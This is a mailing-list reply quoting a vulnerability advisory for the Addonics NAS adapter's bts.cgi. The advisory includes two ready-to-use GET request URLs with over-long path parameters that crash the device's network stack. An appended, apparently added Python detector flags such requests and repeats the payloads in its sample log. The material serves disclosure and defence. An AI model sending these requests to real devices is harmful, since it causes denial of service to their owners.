Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)

Have any of these buffer overflows been debugged and/or proven
exploitable? Is debugging practical on this device? More details may
suffice the mind.

On Mon, Apr 20, 2009 at 4:12 PM, <mcyr2@xxxxxxx> wrote:
> Remote: Yes
> Local: No
> Credit: Mike Cyr, aka h00die
> Vulnerable: NASU2FW41 Loader 1.17
> Not Vulnerable:
>
> Discussion:
>
> Addonics NAS Adapter Post-Auth DoS
>
> Addonics NAS Adapter is prone to several post authentication buffer
> overflows. Each of these buffer overflows will crash the entire TCP/IP stack
> and the device will have to be power cycled to restore any functionality.
> Addonics currently has implemented GUI level (client side) controls for
> preventing long inputs, but by simply doing a direct HTTP GET request (the
> device doesn't use POST) this can be bypassed.
>
> Addonics was notified of the buffer overflows via ticket 497283 on March 25,
> 2009. Vendor acknowledgment on March 26, 2009.
>
> Exploiting these issues will crash the network stack and create a Denial of
> Service condition.
>
> Firmware NASU2FW41 Loader 1.17 is vulnerable; other versions may also be.
>
> Exploit:
>
> http://www.milw0rm.com/exploits/8490
>
> Attackers can use a browser to exploit these issues.
>
> The following GET requests will result in the TCP/IP stack crashing and the
> device requiring a reboot:
>
> 1. Bittorrent: Download Path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>
> 2. Bittorrent: torrent path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC
>
>
>
> References:
>
> Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp
>
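
The quoted advisory notes that input length is limited only in the GUI, so a direct request to `bts.cgi` bypasses it. The following is an added example, not part of the original thread or of any Addonics code: a check that a proxy or log monitor in front of the device could apply to flag over-long `torrent_path` and `download_path` values. The 64-byte limit, the log-line layout and the sample lines are assumptions made for the example.

```python
from urllib.parse import urlsplit, parse_qsl

# Assumption: 64 bytes is a placeholder. The advisory does not state the length
# the GUI enforces; set this to the longest legitimate path in your deployment.
MAX_PARAM_LEN = 64
WATCHED_PATH = "/bts.cgi"
WATCHED_PARAMS = {"torrent_path", "download_path"}

def oversized_params(request_target, limit=MAX_PARAM_LEN):
    """Return [(name, byte_length)] for watched bts.cgi parameters over limit."""
    parts = urlsplit(request_target)
    if parts.path.lower() != WATCHED_PATH:
        return []
    hits = []
    # keep_blank_values so an empty "torrent_path=" is still parsed, not dropped.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        size = len(value.encode("utf-8"))  # measured after percent-decoding
        if name in WATCHED_PARAMS and size > limit:
            hits.append((name, size))
    return hits

def scan_log(lines, limit=MAX_PARAM_LEN):
    """Scan lines shaped like: client "METHOD target PROTO" (assumed layout)."""
    alerts = []
    for line in lines:
        try:
            client, rest = line.split(" ", 1)
            _method, target, _proto = rest.strip().strip('"').split(" ", 2)
        except ValueError:
            continue  # malformed line, nothing to inspect
        for name, size in oversized_params(target, limit):
            alerts.append((client, name, size))
    return alerts

# Constructed sample lines (documentation addresses, not a real capture).
_BASE = "/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply"
SAMPLE_LOG = [
    '192.0.2.10 "GET ' + _BASE + '&torrent_path=&download_path=PUBLIC HTTP/1.1"',
    '192.0.2.66 "GET ' + _BASE + '&torrent_path=&download_path=' + "a" * 600 + ' HTTP/1.1"',
    '192.0.2.66 "GET ' + _BASE + '&torrent_path=' + "a" * 600 + '&download_path=PUBLIC HTTP/1.1"',
    '192.0.2.10 "GET /index.htm?download_path=' + "a" * 600 + ' HTTP/1.1"',
]

if __name__ == "__main__":
    for client, name, size in scan_log(SAMPLE_LOG):
        print(f"ALERT {client}: {name} is {size} bytes (limit {MAX_PARAM_LEN})")
```

The same `oversized_params` check can be used to reject the request at a reverse proxy instead of only alerting on it.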